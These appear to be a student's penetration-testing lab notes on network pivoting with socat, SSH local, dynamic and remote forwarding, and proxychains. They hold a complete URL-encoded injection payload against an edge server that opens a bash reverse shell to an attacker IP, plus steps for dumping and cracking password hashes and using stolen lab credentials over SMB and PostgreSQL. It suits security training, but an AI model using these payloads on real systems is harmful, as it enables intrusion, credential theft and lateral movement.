Linux

socat

socat -ddd TCP-LISTEN:<Listing port>,fork TCP:<Target IP>:<Target port>

SSH Local Port Forwarding

• Practice:

  Edge Device IP (CONFLUENCE01): 192.168.110.63 SSH server IP (PGDATABASE01): 10.4.110.215 Target IP (HRSHARES): 172.16.110.217

  Provided Attacker IP: 192.168.45.209

  Enumerating the edge device, we identify a remote code execution vulnerability we can exploit to obtain a reverse shell.

On the attacker machine:
1. run nc -lnvp 4444
2. run the following curl command to initiate a reverse shell
curl -v <http://192.168.110.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/192.168.45.209/4444%200%3E%261%27%29.start%28%29%22%29%7D/>

1. Establish TTY functionality using python's pty module:
	python3 -c 'import pty; pty.spawn("/bin/bash")'

2. Initiate the SSH connection to the server, and specify the ports we are trying to forward
	ssh -N -L 0.0.0.0:5454:10.4.110.215:5432 database_admin@10.4.110.215
	Forwarding traffic from local port 5454 to ssh server on port 5432

psql -h 192.168.110.63 -p 5454 -U postgres
 > Using discovered password: D@t4basePassw0rd!
 
Enumeration:
1. \\l
2. \\c confluence
3. SELECT * from cwd_user
4. Extract all usrnames and their associated password hashes
5. Crack the hashes using hashcat (mode 12001 | Atlassian)

Discovered credentials:
hr_admin: Welcome1234
rdp_admin: P@ssw0rd!
database_admin: sqlpass123

ssh -N -L 0.0.0.0:4545:172.16.110.217:445 database_admin@10.4.110.215

smbclient -L //192.168.110.63 -p 4545 -U hr_admin --password Welcome1234
	> Identify a /scripts share
	
smbclient //192.168.110.63/scripts -p 4545 -U hr_admin --password Welcome1234
	> Initiate connection to the /scripts share
	
Enumerating the share, we eventually find our flag
ls -la, get provisioning.ps1; exit; cat provisioning.ps1

SSH Dynamic Port Forwarding

Run on the SSH client:		
	ssh -N -D 0.0.0.0:<Listening Port> <username>@<SSH server IP>

Now that the destination socket is dynamically assigned, we need to configure proxychains to facilitate the forwarding of traffic. After installing proxychains, we need to configure the proxy in /etc/proxychains.conf

Append: socks5 <proxy IP> <proxy Port>

Now on the attacker machine, we can run commands as if we are on the proxy machine, as long as we include the command proxychains at the start of the statement.

Examples:
	proxychains nmap -T4 -Pn -sT -p4800-4900 172.16.110.217
	proxychains ./ssh_dynamic_client -i 172.16.110.217 -p 4872

• SSH Remote Port Forwarding

  Because inbound traffic is much more restricted compared to outbound traffic, we may not always be able to SSH directly into a network and port forward from there.

  Which is why we perform remote SSH port forwarding, by initiating a SSH connection to our attacker machine, we are able to bind a listening port on our attacker machine to an internal address accessible via the SSH client.

  With the listening port bound to the attacker machine, the SSH client is now responsible for forwarding traffic.

Ensure the SSH is running on the attacker machine

Run on the SSH client:		
	ssh -N -R 0.0.0.0:<Listening Port>:<Target IP>:<Target Port> kali@<attacker IP>
	
Verify with: ss -ntplu

Now commands can be ran with the target IP being the attacker’s localhost, and it will be redirected to the specified target IP and Port

Example:
	psql -h 127.0.0.1 -p 2345 -U postgres
	
	\\l
	\\c hr_backup
	SELECT * FROM payroll;

• SSH Remote Dynamic Port Forwarding

  Like SSH Dynamic Port Forwarding, we are implementing the dynamic aspect to our SSH Remote Port Forwarding attack.

Ensure the SSH is running on the attacker machine

Run on the SSH client:		
	ssh -N -R <attacker listening Port> kali@<attacker IP>
	
Verify with: ss -ntplu

Like SSH Dynamic Port Forwarding, we will need proxychains to facilitate the forwarding of traffic. After installing proxychains, we need to configure the proxy in /etc/proxychains.conf

Append: socks5 127.0.0.1 <attacker listening Port>

Examples:
	proxychains nmap -vvv -sT --top-ports=20 -Pn -n 10.4.50.64
	
	for i in $(seq 9000 9100); do proxychains ./executables/ssh_remote_dynamic_client -i 10.4.110.64 -p $i; done